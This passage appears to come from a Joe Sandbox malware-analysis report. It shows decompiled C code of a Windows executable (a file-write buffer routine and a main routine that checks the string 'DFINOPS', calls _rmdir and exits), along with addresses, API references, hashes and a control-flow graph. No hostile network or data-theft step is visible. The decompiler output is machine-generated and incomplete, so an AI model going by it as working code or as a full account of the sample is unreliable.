                                                                                                                                                              				void* _t34;
                                                                                                                                                              				void* _t42;
                                                                                                                                                              				void* _t51;
                                                                                                                                                              				void* _t57;
                                                                                                                                                              				void* _t59;
                                                                                                                                                              				int _t71;
                                                                                                                                                              				void** _t72;
                                                                                                                                                              
                                                                                                                                                              				_t72 = _a4;
                                                                                                                                                              				_v4 = 0;
                                                                                                                                                              				if(_t72[5] == 1) {
                                                                                                                                                              					SetFilePointer( *_t72,  ~(_t72[3]), 0, 1); // executed
                                                                                                                                                              					_t72[5] = 0;
                                                                                                                                                              					_t72[3] = _t72[2];
                                                                                                                                                              				}
                                                                                                                                                              				_t51 = _t72[3];
                                                                                                                                                              				_t71 = _a12;
                                                                                                                                                              				if(_t51 <= _t71) {
                                                                                                                                                              					E00405F90(_t72);
                                                                                                                                                              					_t34 = _t72[2];
                                                                                                                                                              					if(_t71 < _t34) {
                                                                                                                                                              						memcpy(_t72[1] - _t72[3] + _t34, _a8, _t71);
                                                                                                                                                              						_t72[3] = _t72[3] - _t71;
                                                                                                                                                              						return _t71;
                                                                                                                                                              					} else {
                                                                                                                                                              						WriteFile( *_t72, _a8, _t71,  &_v4, 0);
                                                                                                                                                              						return _v4;
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					_t42 = _t72[2] + _t72[1] - _t51;
                                                                                                                                                              					_t57 = _t71 - 1;
                                                                                                                                                              					if(_t57 == 0) {
                                                                                                                                                              						 *_t42 =  *_a8;
                                                                                                                                                              						_t72[3] = _t72[3] - _t71;
                                                                                                                                                              						return _t71;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t59 = _t57 - 1;
                                                                                                                                                              						if(_t59 == 0) {
                                                                                                                                                              							 *_t42 =  *_a8;
                                                                                                                                                              							_t72[3] = _t72[3] - _t71;
                                                                                                                                                              							return _t71;
                                                                                                                                                              						} else {
                                                                                                                                                              							if(_t59 == 2) {
                                                                                                                                                              								 *_t42 =  *_a8;
                                                                                                                                                              								_t72[3] = _t72[3] - _t71;
                                                                                                                                                              								return _t71;
                                                                                                                                                              							} else {
                                                                                                                                                              								memcpy(_t42, _a8, _t71);
                                                                                                                                                              								_t72[3] = _t72[3] - _t71;
                                                                                                                                                              								return _t71;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              			}











                                                                                                                                                              0x00406332
                                                                                                                                                              0x0040633b
                                                                                                                                                              0x00406343
                                                                                                                                                              0x00406352
                                                                                                                                                              0x0040635b
                                                                                                                                                              0x00406362
                                                                                                                                                              0x00406362
                                                                                                                                                              0x00406365
                                                                                                                                                              0x00406368
                                                                                                                                                              0x0040636e
                                                                                                                                                              0x004063df
                                                                                                                                                              0x004063e4
                                                                                                                                                              0x004063e9
                                                                                                                                                              0x0040641a
                                                                                                                                                              0x00406422
                                                                                                                                                              0x0040642a
                                                                                                                                                              0x004063eb
                                                                                                                                                              0x004063fb
                                                                                                                                                              0x00406408
                                                                                                                                                              0x00406408
                                                                                                                                                              0x00406370
                                                                                                                                                              0x00406376
                                                                                                                                                              0x0040637a
                                                                                                                                                              0x0040637d
                                                                                                                                                              0x004063d1
                                                                                                                                                              0x004063d3
                                                                                                                                                              0x004063db
                                                                                                                                                              0x0040637f
                                                                                                                                                              0x0040637f
                                                                                                                                                              0x00406382
                                                                                                                                                              0x004063bd
                                                                                                                                                              0x004063c0
                                                                                                                                                              0x004063c8
                                                                                                                                                              0x00406384
                                                                                                                                                              0x00406387
                                                                                                                                                              0x004063a9
                                                                                                                                                              0x004063ab
                                                                                                                                                              0x004063b3
                                                                                                                                                              0x00406389
                                                                                                                                                              0x00406390
                                                                                                                                                              0x00406398
                                                                                                                                                              0x004063a0
                                                                                                                                                              0x004063a0
                                                                                                                                                              0x00406387
                                                                                                                                                              0x00406382
                                                                                                                                                              0x0040637d

                                                                                                                                                              APIs
                                                                                                                                                              • SetFilePointer.KERNELBASE(?,?,00000000,00000001,?,?,?,00406298,00000000,?,?,?,021405A8,00000000), ref: 00406352
                                                                                                                                                              • memcpy.MSVCRT ref: 00406390
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FilePointermemcpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1104741977-0
                                                                                                                                                              • Opcode ID: 871ba12d0a710b8b10be5d67f70c539bcef7555e48d6414b570282c5163502cc
                                                                                                                                                              • Instruction ID: f3a8af50231a035adb1325dfd7a6e35cec90defb10c0b62dd41d6b31aad5b5db
                                                                                                                                                              • Opcode Fuzzy Hash: 871ba12d0a710b8b10be5d67f70c539bcef7555e48d6414b570282c5163502cc
                                                                                                                                                              • Instruction Fuzzy Hash: 09316C763006009FC224DF2AD448E5BF7E9EFD4321F14C82EE69697B90C634E854CBA6
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 386 4015dd 387 401672-401673 call 40505e 386->387 391 4015e2-4015ea 387->391 392 4015c5-4015d8 _rmdir 387->392 394 40162b-401633 391->394 395 4015ec-4015fa call 405066 391->395 393 401ba4-401bb4 ExitProcess HeapDestroy ExitProcess 392->393 394->387 397 401635-401643 call 405074 394->397 400 401628-401629 395->400 401 4015fc-401626 call 4045fc call 4030f0 call 404925 395->401 403 401671 397->403 404 401645-40166f call 4045fc call 4030f0 call 404925 397->404 400->387 417 401678-4016cd call 4031f0 call 406860 call 403de0 call 4074c0 401->417 403->387 404->417 426 4016fd-40170f call 4020b1 417->426 427 4016cf-4016f8 call 4036a2 _rmdir 417->427 432 401711-401716 426->432 433 40171b-4017b0 call 401d3f call 403de0 call 4030f0 call 403de0 call 4030f0 call 4020b1 426->433 427->393 432->433 446 401a25-401a69 call 4074f0 * 3 call 4030f0 call 406170 433->446 447 4017b6-4017fe call 403a18 call 403de0 call 4074c0 433->447 471 401a87-401ac0 call 405ea0 call 402025 call 4036a2 _rmdir 446->471 472 401a6b-401ad2 call 406250 call 405fd0 call 4074c0 446->472 461 401800-401809 447->461 462 401812 447->462 461->462 465 40180b-401810 461->465 463 401814-401816 462->463 463->446 466 40181c-401863 call 405dd5 call 4036f8 call 4030f0 call 4074c0 463->466 465->463 492 4019c6-401a20 call 403a79 call 405e15 call 405e90 _rmdir 466->492 493 401869-401893 call 4074f0 call 4030f0 call 4074c0 466->493 471->393 494 401ad4-401ada call 402118 472->494 495 401adf-401b92 call 4074f0 * 2 call 402761 call 402025 call 405ea0 call 403a79 call 405e15 call 405e90 _rmdir 472->495 492->393 514 4018a0-4018b2 call 406230 493->514 515 401895-40189b call 402118 493->515 494->495 495->393 522 401998-4019aa call 406170 514->522 523 4018b8-401937 call 405fd0 call 4074f0 * 5 call 4036a2 514->523 515->514 522->492 533 4019ac-4019c1 call 406250 call 405fd0 522->533 523->522 552 401939-401993 call 403a79 call 405e15 call 405e90 _rmdir 523->552 533->492 552->393
                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                              			E004015DD(void* __ecx, void* __edi, void* __esi) {
                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                              				intOrPtr _v64;
                                                                                                                                                              				intOrPtr _t11;
                                                                                                                                                              				intOrPtr _t15;
                                                                                                                                                              				void* _t16;
                                                                                                                                                              				intOrPtr _t17;
                                                                                                                                                              				intOrPtr _t19;
                                                                                                                                                              				int _t22;
                                                                                                                                                              				intOrPtr _t25;
                                                                                                                                                              				intOrPtr _t28;
                                                                                                                                                              				int _t31;
                                                                                                                                                              				int _t37;
                                                                                                                                                              				intOrPtr _t59;
                                                                                                                                                              				void* _t61;
                                                                                                                                                              				intOrPtr _t64;
                                                                                                                                                              				intOrPtr _t66;
                                                                                                                                                              				int _t69;
                                                                                                                                                              				intOrPtr _t71;
                                                                                                                                                              				intOrPtr _t72;
                                                                                                                                                              				intOrPtr _t77;
                                                                                                                                                              				intOrPtr _t78;
                                                                                                                                                              				void* _t80;
                                                                                                                                                              				intOrPtr _t97;
                                                                                                                                                              				intOrPtr _t98;
                                                                                                                                                              				intOrPtr _t99;
                                                                                                                                                              				void* _t101;
                                                                                                                                                              				intOrPtr _t104;
                                                                                                                                                              				intOrPtr _t108;
                                                                                                                                                              				intOrPtr _t116;
                                                                                                                                                              				intOrPtr _t117;
                                                                                                                                                              				intOrPtr _t121;
                                                                                                                                                              				intOrPtr _t125;
                                                                                                                                                              				void* _t130;
                                                                                                                                                              				void* _t131;
                                                                                                                                                              				void* _t133;
                                                                                                                                                              				void* _t134;
                                                                                                                                                              				intOrPtr _t135;
                                                                                                                                                              				intOrPtr _t137;
                                                                                                                                                              				void* _t138;
                                                                                                                                                              				intOrPtr _t139;
                                                                                                                                                              				intOrPtr _t140;
                                                                                                                                                              				intOrPtr _t141;
                                                                                                                                                              				intOrPtr _t142;
                                                                                                                                                              				intOrPtr _t143;
                                                                                                                                                              				intOrPtr _t144;
                                                                                                                                                              				void* _t145;
                                                                                                                                                              				intOrPtr _t147;
                                                                                                                                                              				void* _t148;
                                                                                                                                                              				intOrPtr _t149;
                                                                                                                                                              				intOrPtr _t150;
                                                                                                                                                              				intOrPtr _t151;
                                                                                                                                                              				intOrPtr _t152;
                                                                                                                                                              				void* _t153;
                                                                                                                                                              				intOrPtr _t154;
                                                                                                                                                              				intOrPtr _t155;
                                                                                                                                                              				intOrPtr _t157;
                                                                                                                                                              				intOrPtr _t159;
                                                                                                                                                              				intOrPtr _t160;
                                                                                                                                                              				intOrPtr _t161;
                                                                                                                                                              				intOrPtr _t162;
                                                                                                                                                              				void* _t163;
                                                                                                                                                              				void* _t164;
                                                                                                                                                              				void* _t165;
                                                                                                                                                              				intOrPtr* _t166;
                                                                                                                                                              				intOrPtr* _t167;
                                                                                                                                                              
                                                                                                                                                              				_t165 = __esi;
                                                                                                                                                              				_t164 = __edi;
                                                                                                                                                              				while(1) {
                                                                                                                                                              					_push(E0040505E());
                                                                                                                                                              					if(0x10 ==  *_t166) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					__eflags = 0x332d -  *_t166;
                                                                                                                                                              					if(0x332d !=  *_t166) {
                                                                                                                                                              						__eflags = 0x332c -  *_t166;
                                                                                                                                                              						if(0x332c !=  *_t166) {
                                                                                                                                                              							continue;
                                                                                                                                                              						} else {
                                                                                                                                                              							_push(E00405074());
                                                                                                                                                              							__eflags = 3 -  *_t166;
                                                                                                                                                              							if(__eflags != 0) {
                                                                                                                                                              								continue;
                                                                                                                                                              							} else {
                                                                                                                                                              								_t11 =  *0x40b3b0; // 0x0
                                                                                                                                                              								E004045FC(__eflags, 2, _t11);
                                                                                                                                                              								_t130 = _t11;
                                                                                                                                                              								E004030F0(0x40b194, _t130);
                                                                                                                                                              								E00404925(_t164, __eflags, 0);
                                                                                                                                                              								_t167 = _t166 + 8;
                                                                                                                                                              								goto L12;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						_push(E00405066());
                                                                                                                                                              						__eflags = 4 -  *_t166;
                                                                                                                                                              						if(__eflags != 0) {
                                                                                                                                                              							continue;
                                                                                                                                                              						} else {
                                                                                                                                                              							_t108 =  *0x40b3b0; // 0x0
                                                                                                                                                              							E004045FC(__eflags, 2, _t108);
                                                                                                                                                              							_t163 = _t108;
                                                                                                                                                              							E004030F0(0x40b194, _t163);
                                                                                                                                                              							E00404925(_t164, __eflags, 0);
                                                                                                                                                              							_t167 = _t166 + 8;
                                                                                                                                                              							L12:
                                                                                                                                                              							_t15 =  *0x40b3b0; // 0x0
                                                                                                                                                              							_push(_t15);
                                                                                                                                                              							_t16 = E004031F0( *0x40b194);
                                                                                                                                                              							_t17 =  *0x40b194; // 0x0
                                                                                                                                                              							E00406860(__eflags, _t17, _t16, _t15);
                                                                                                                                                              							 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                              							_t19 =  *0x40b3b0; // 0x0
                                                                                                                                                              							E00403DE0( *0x40b130,  *0x40b16c);
                                                                                                                                                              							_t131 = _t19;
                                                                                                                                                              							_t121 = _t19;
                                                                                                                                                              							 *0x40b3b0 = _t121;
                                                                                                                                                              							_t122 = _t121 +  *0x40a390;
                                                                                                                                                              							__eflags = _t131 +  *0x40a390;
                                                                                                                                                              							E004074C0(_t121 +  *0x40a390, _t131 +  *0x40a390);
                                                                                                                                                              							if(__eflags != 0) {
                                                                                                                                                              								_t22 = E004020B1( *0x40b174, 0x40a0ca);
                                                                                                                                                              								__eflags = _t22;
                                                                                                                                                              								if(_t22 != 0) {
                                                                                                                                                              									_t104 =  *0x40b130; // 0x40c154
                                                                                                                                                              									 *0x40b198 = _t104;
                                                                                                                                                              								}
                                                                                                                                                              								_push( *0x40b118);
                                                                                                                                                              								_push( *0x40b114);
                                                                                                                                                              								_push( *0x40b110);
                                                                                                                                                              								_push( *0x40b198);
                                                                                                                                                              								_push( *0x40b190);
                                                                                                                                                              								_push( *0x40b18c);
                                                                                                                                                              								_push( *0x40b188);
                                                                                                                                                              								_push( *0x40b194);
                                                                                                                                                              								_push( *0x40b174);
                                                                                                                                                              								E00401D3F();
                                                                                                                                                              								_t25 =  *0x40b3b0; // 0x0
                                                                                                                                                              								_push(_t25);
                                                                                                                                                              								E00403DE0( *0x40b104,  *0x40b110);
                                                                                                                                                              								_t133 = _t25;
                                                                                                                                                              								E004030F0(0x40b19c, _t133);
                                                                                                                                                              								_t28 =  *0x40b3b0; // 0x0
                                                                                                                                                              								_push(_t28);
                                                                                                                                                              								E00403DE0( *0x40b108,  *0x40b114);
                                                                                                                                                              								_t134 = _t28;
                                                                                                                                                              								E004030F0(0x40b1a0, _t134);
                                                                                                                                                              								_t31 = E004020B1( *0x40b174, "DFINOPS");
                                                                                                                                                              								__eflags = _t31;
                                                                                                                                                              								if(_t31 == 0) {
                                                                                                                                                              									L32:
                                                                                                                                                              									_t135 =  *0x40b12c; // 0x2264840
                                                                                                                                                              									_push( *0x40b3b0);
                                                                                                                                                              									E004074F0(_t135);
                                                                                                                                                              									E004074F0(0x40a0ba);
                                                                                                                                                              									_t137 =  *0x40b184; // 0x22649f0
                                                                                                                                                              									E004074F0(_t137);
                                                                                                                                                              									_t122 = 0x40b184;
                                                                                                                                                              									_pop(_t138);
                                                                                                                                                              									E004030F0(0x40b184, _t138);
                                                                                                                                                              									_push( *0x40b184);
                                                                                                                                                              									_t37 = E00406170(__eflags, 1);
                                                                                                                                                              									__eflags = _t37;
                                                                                                                                                              									if(_t37 == 0) {
                                                                                                                                                              										E00405EA0( *0x40b184);
                                                                                                                                                              										E00402025();
                                                                                                                                                              										_push(0x10);
                                                                                                                                                              										E004036A2( *0x40b13c,  *0x40b158);
                                                                                                                                                              										_push( *0x40b12c);
                                                                                                                                                              										L00403196();
                                                                                                                                                              										ExitProcess(1);
                                                                                                                                                              									} else {
                                                                                                                                                              										E00406250(_t164, 1,  *0x40b19c);
                                                                                                                                                              										E00405FD0(1);
                                                                                                                                                              										_t139 =  *0x40b1a0; // 0x2264828
                                                                                                                                                              										_t122 = 0;
                                                                                                                                                              										__eflags = 0;
                                                                                                                                                              										E004074C0(0, _t139);
                                                                                                                                                              										if(__eflags == 0) {
                                                                                                                                                              											_push( *0x40b1a0);
                                                                                                                                                              											E00402118();
                                                                                                                                                              										}
                                                                                                                                                              										_push( *0x40b3b0);
                                                                                                                                                              										_t140 =  *0x40b17c; // 0x0
                                                                                                                                                              										_push( *0x40b3b0);
                                                                                                                                                              										E004074F0(_t140);
                                                                                                                                                              										_t141 =  *0x40b128; // 0x0
                                                                                                                                                              										E004074F0(_t141);
                                                                                                                                                              										 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                              										_push( *0x40b124);
                                                                                                                                                              										_push( *0x40b184);
                                                                                                                                                              										_t142 =  *0x40a390; // 0x22606f0
                                                                                                                                                              										_v56 = _v56 + _t142;
                                                                                                                                                              										E00402761();
                                                                                                                                                              										_pop( *0x40b3b0);
                                                                                                                                                              										E00402025();
                                                                                                                                                              										E00405EA0( *0x40b184); // executed
                                                                                                                                                              										_push( *0x40b3b0);
                                                                                                                                                              										_t59 =  *0x40b3b0; // 0x0
                                                                                                                                                              										E00403A79(__eflags,  *0x40b3b0);
                                                                                                                                                              										 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                              										_t143 =  *0x40a390; // 0x22606f0
                                                                                                                                                              										 *_t167 =  *_t167 + _t143;
                                                                                                                                                              										_t61 = E00405E15(_t59, _t59);
                                                                                                                                                              										 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                              										_t144 =  *0x40a390; // 0x22606f0
                                                                                                                                                              										 *_t167 =  *_t167 + _t144; // executed
                                                                                                                                                              										E00405E90(_t61,  *0x40b3b0); // executed
                                                                                                                                                              										_pop( *0x40b3b0);
                                                                                                                                                              										_push( *0x40b12c); // executed
                                                                                                                                                              										L00403196(); // executed
                                                                                                                                                              										ExitProcess(0);
                                                                                                                                                              									}
                                                                                                                                                              								} else {
                                                                                                                                                              									_t64 =  *0x40b3b0; // 0x0
                                                                                                                                                              									_push(_t64);
                                                                                                                                                              									E00403A18(0x40b1a0, 0, _t64);
                                                                                                                                                              									 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                              									_t66 =  *0x40b3b0; // 0x0
                                                                                                                                                              									E00403DE0( *0x40b130,  *0x40b16c);
                                                                                                                                                              									_t145 = _t66;
                                                                                                                                                              									_t125 = _t66;
                                                                                                                                                              									 *0x40b3b0 = _t125;
                                                                                                                                                              									_t126 = _t125 +  *0x40a390;
                                                                                                                                                              									__eflags = _t145 +  *0x40a390;
                                                                                                                                                              									E004074C0(_t125 +  *0x40a390, _t145 +  *0x40a390);
                                                                                                                                                              									if(__eflags == 0) {
                                                                                                                                                              										L21:
                                                                                                                                                              										_t69 = 0;
                                                                                                                                                              										__eflags = 0;
                                                                                                                                                              									} else {
                                                                                                                                                              										_t117 =  *0x40b170; // 0x0
                                                                                                                                                              										__eflags = _t117 - 1;
                                                                                                                                                              										if(_t117 != 1) {
                                                                                                                                                              											goto L21;
                                                                                                                                                              										} else {
                                                                                                                                                              											_t69 = 1;
                                                                                                                                                              										}
                                                                                                                                                              									}
                                                                                                                                                              									__eflags = _t69;
                                                                                                                                                              									if(__eflags == 0) {
                                                                                                                                                              										goto L32;
                                                                                                                                                              									} else {
                                                                                                                                                              										_t71 =  *0x40b3b0; // 0x0
                                                                                                                                                              										_t72 =  *0x40b3b0; // 0x0
                                                                                                                                                              										E00405DD5(__eflags, _t72);
                                                                                                                                                              										 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                              										_t147 =  *0x40a390; // 0x22606f0
                                                                                                                                                              										_v64 = _v64 + _t147;
                                                                                                                                                              										E004036F8(_t126, _t165,  *0x40b160, _t72, _t71);
                                                                                                                                                              										_t148 = _t71;
                                                                                                                                                              										E004030F0(0x40b1a4, _t148);
                                                                                                                                                              										_t149 =  *0x40b1a4; // 0x0
                                                                                                                                                              										_t122 = 0;
                                                                                                                                                              										__eflags = 0;
                                                                                                                                                              										E004074C0(0, _t149);
                                                                                                                                                              										if(__eflags != 0) {
                                                                                                                                                              											L31:
                                                                                                                                                              											_t77 =  *0x40b3b0; // 0x0
                                                                                                                                                              											_t78 =  *0x40b3b0; // 0x0
                                                                                                                                                              											E00403A79(__eflags,  *0x40b3b0);
                                                                                                                                                              											 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                              											_t150 =  *0x40a390; // 0x22606f0
                                                                                                                                                              											 *_t167 =  *_t167 + _t150;
                                                                                                                                                              											_t80 = E00405E15(_t78, _t78);
                                                                                                                                                              											 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                              											_t151 =  *0x40a390; // 0x22606f0
                                                                                                                                                              											 *_t167 =  *_t167 + _t151;
                                                                                                                                                              											E00405E90(_t80, _t77);
                                                                                                                                                              											 *0x40b3b0 = _t77;
                                                                                                                                                              											_push( *0x40b12c);
                                                                                                                                                              											L00403196();
                                                                                                                                                              											ExitProcess(0);
                                                                                                                                                              										} else {
                                                                                                                                                              											_t152 =  *0x40b1a4; // 0x0
                                                                                                                                                              											_push( *0x40b3b0);
                                                                                                                                                              											E004074F0(_t152);
                                                                                                                                                              											_pop(_t153);
                                                                                                                                                              											E004030F0(0x40b124, _t153);
                                                                                                                                                              											_t154 =  *0x40b1a0; // 0x2264828
                                                                                                                                                              											_t122 = 0;
                                                                                                                                                              											__eflags = 0;
                                                                                                                                                              											E004074C0(0, _t154);
                                                                                                                                                              											if(__eflags == 0) {
                                                                                                                                                              												_push( *0x40b1a0);
                                                                                                                                                              												E00402118();
                                                                                                                                                              											}
                                                                                                                                                              											__eflags = E00406230(1,  *0x40b184);
                                                                                                                                                              											if(__eflags == 0) {
                                                                                                                                                              												L29:
                                                                                                                                                              												_push( *0x40b184);
                                                                                                                                                              												__eflags = E00406170(__eflags, 1);
                                                                                                                                                              												if(__eflags != 0) {
                                                                                                                                                              													E00406250(_t164, 1,  *0x40b19c);
                                                                                                                                                              													E00405FD0(1);
                                                                                                                                                              												}
                                                                                                                                                              												goto L31;
                                                                                                                                                              											} else {
                                                                                                                                                              												E00405FD0(1);
                                                                                                                                                              												_push( *0x40b3b0);
                                                                                                                                                              												_t155 =  *0x40b150; // 0x2260588
                                                                                                                                                              												E004074F0(_t155);
                                                                                                                                                              												E004074F0(0x40a011);
                                                                                                                                                              												_t157 =  *0x40b184; // 0x22649f0
                                                                                                                                                              												E004074F0(_t157);
                                                                                                                                                              												E004074F0(0x40a011);
                                                                                                                                                              												_t159 =  *0x40b154; // 0x22605a0
                                                                                                                                                              												E004074F0(_t159);
                                                                                                                                                              												 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                              												_t160 =  *0x40a390; // 0x22606f0
                                                                                                                                                              												_v64 = _v64 + _t160;
                                                                                                                                                              												_t97 = E004036A2( *0x40b14c,  *0x40b3b0);
                                                                                                                                                              												 *0x40b3b0 = 0x24;
                                                                                                                                                              												 *0x40b1a8 = _t97;
                                                                                                                                                              												_t116 =  *0x40b1a8; // 0x0
                                                                                                                                                              												__eflags = _t116 - 7;
                                                                                                                                                              												if(__eflags != 0) {
                                                                                                                                                              													goto L29;
                                                                                                                                                              												} else {
                                                                                                                                                              													_t98 =  *0x40b3b0; // 0x0
                                                                                                                                                              													_t99 =  *0x40b3b0; // 0x0
                                                                                                                                                              													E00403A79(__eflags,  *0x40b3b0);
                                                                                                                                                              													 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                              													_t161 =  *0x40a390; // 0x22606f0
                                                                                                                                                              													 *_t167 =  *_t167 + _t161;
                                                                                                                                                              													_t101 = E00405E15(_t99, _t99);
                                                                                                                                                              													 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                              													_t162 =  *0x40a390; // 0x22606f0
                                                                                                                                                              													 *_t167 =  *_t167 + _t162;
                                                                                                                                                              													E00405E90(_t101, _t98);
                                                                                                                                                              													 *0x40b3b0 = _t98;
                                                                                                                                                              													_push( *0x40b12c);
                                                                                                                                                              													L00403196();
                                                                                                                                                              													ExitProcess(0);
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              										}
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              							} else {
                                                                                                                                                              								_push(0x10);
                                                                                                                                                              								E004036A2( *0x40b13c,  *0x40b148);
                                                                                                                                                              								_push( *0x40b12c);
                                                                                                                                                              								L00403196();
                                                                                                                                                              								ExitProcess(1);
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					L38:
                                                                                                                                                              					HeapDestroy( *0x40b0f8); // executed
                                                                                                                                                              					ExitProcess(??); // executed
                                                                                                                                                              					E00403B0B();
                                                                                                                                                              					E00403DB0(E00403CC0());
                                                                                                                                                              					E00404150();
                                                                                                                                                              					E00404A13(_t122);
                                                                                                                                                              					return E0040681C(E00406030());
                                                                                                                                                              				}
                                                                                                                                                              				_push( *0x40b12c);
                                                                                                                                                              				L00403196();
                                                                                                                                                              				ExitProcess(0);
                                                                                                                                                              				goto L38;
                                                                                                                                                              			}




































































                                                                                                                                                              0x004015dd
                                                                                                                                                              0x004015dd
                                                                                                                                                              0x00401672
                                                                                                                                                              0x004015ba
                                                                                                                                                              0x004015c3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004015e7
                                                                                                                                                              0x004015ea
                                                                                                                                                              0x00401630
                                                                                                                                                              0x00401633
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401635
                                                                                                                                                              0x0040163a
                                                                                                                                                              0x00401640
                                                                                                                                                              0x00401643
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401645
                                                                                                                                                              0x00401645
                                                                                                                                                              0x00401651
                                                                                                                                                              0x0040165c
                                                                                                                                                              0x0040165d
                                                                                                                                                              0x00401667
                                                                                                                                                              0x0040166c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040166c
                                                                                                                                                              0x00401643
                                                                                                                                                              0x004015ec
                                                                                                                                                              0x004015f1
                                                                                                                                                              0x004015f7
                                                                                                                                                              0x004015fa
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004015fc
                                                                                                                                                              0x004015fc
                                                                                                                                                              0x00401608
                                                                                                                                                              0x00401613
                                                                                                                                                              0x00401614
                                                                                                                                                              0x0040161e
                                                                                                                                                              0x00401623
                                                                                                                                                              0x00401678
                                                                                                                                                              0x00401678
                                                                                                                                                              0x0040167d
                                                                                                                                                              0x00401685
                                                                                                                                                              0x0040168b
                                                                                                                                                              0x00401691
                                                                                                                                                              0x00401696
                                                                                                                                                              0x0040169c
                                                                                                                                                              0x004016af
                                                                                                                                                              0x004016b4
                                                                                                                                                              0x004016b5
                                                                                                                                                              0x004016b6
                                                                                                                                                              0x004016bc
                                                                                                                                                              0x004016c2
                                                                                                                                                              0x004016c8
                                                                                                                                                              0x004016cd
                                                                                                                                                              0x00401708
                                                                                                                                                              0x0040170d
                                                                                                                                                              0x0040170f
                                                                                                                                                              0x00401711
                                                                                                                                                              0x00401716
                                                                                                                                                              0x00401716
                                                                                                                                                              0x0040171b
                                                                                                                                                              0x00401721
                                                                                                                                                              0x00401727
                                                                                                                                                              0x0040172d
                                                                                                                                                              0x00401733
                                                                                                                                                              0x00401739
                                                                                                                                                              0x0040173f
                                                                                                                                                              0x00401745
                                                                                                                                                              0x0040174b
                                                                                                                                                              0x00401751
                                                                                                                                                              0x00401756
                                                                                                                                                              0x0040175b
                                                                                                                                                              0x00401769
                                                                                                                                                              0x00401774
                                                                                                                                                              0x00401775
                                                                                                                                                              0x0040177a
                                                                                                                                                              0x0040177f
                                                                                                                                                              0x0040178d
                                                                                                                                                              0x00401798
                                                                                                                                                              0x00401799
                                                                                                                                                              0x004017a9
                                                                                                                                                              0x004017ae
                                                                                                                                                              0x004017b0
                                                                                                                                                              0x00401a25
                                                                                                                                                              0x00401a25
                                                                                                                                                              0x00401a2b
                                                                                                                                                              0x00401a31
                                                                                                                                                              0x00401a3b
                                                                                                                                                              0x00401a40
                                                                                                                                                              0x00401a46
                                                                                                                                                              0x00401a4b
                                                                                                                                                              0x00401a51
                                                                                                                                                              0x00401a52
                                                                                                                                                              0x00401a57
                                                                                                                                                              0x00401a62
                                                                                                                                                              0x00401a67
                                                                                                                                                              0x00401a69
                                                                                                                                                              0x00401a8d
                                                                                                                                                              0x00401a92
                                                                                                                                                              0x00401a97
                                                                                                                                                              0x00401aa8
                                                                                                                                                              0x00401aad
                                                                                                                                                              0x00401ab3
                                                                                                                                                              0x00401ba4
                                                                                                                                                              0x00401a6b
                                                                                                                                                              0x00401a76
                                                                                                                                                              0x00401a80
                                                                                                                                                              0x00401ac5
                                                                                                                                                              0x00401acb
                                                                                                                                                              0x00401acb
                                                                                                                                                              0x00401acd
                                                                                                                                                              0x00401ad2
                                                                                                                                                              0x00401ad4
                                                                                                                                                              0x00401ada
                                                                                                                                                              0x00401ada
                                                                                                                                                              0x00401adf
                                                                                                                                                              0x00401ae5
                                                                                                                                                              0x00401aeb
                                                                                                                                                              0x00401af1
                                                                                                                                                              0x00401af6
                                                                                                                                                              0x00401afc
                                                                                                                                                              0x00401b01
                                                                                                                                                              0x00401b07
                                                                                                                                                              0x00401b0d
                                                                                                                                                              0x00401b13
                                                                                                                                                              0x00401b19
                                                                                                                                                              0x00401b1d
                                                                                                                                                              0x00401b22
                                                                                                                                                              0x00401b28
                                                                                                                                                              0x00401b33
                                                                                                                                                              0x00401b3d
                                                                                                                                                              0x00401b3f
                                                                                                                                                              0x00401b4c
                                                                                                                                                              0x00401b51
                                                                                                                                                              0x00401b57
                                                                                                                                                              0x00401b5d
                                                                                                                                                              0x00401b60
                                                                                                                                                              0x00401b65
                                                                                                                                                              0x00401b6b
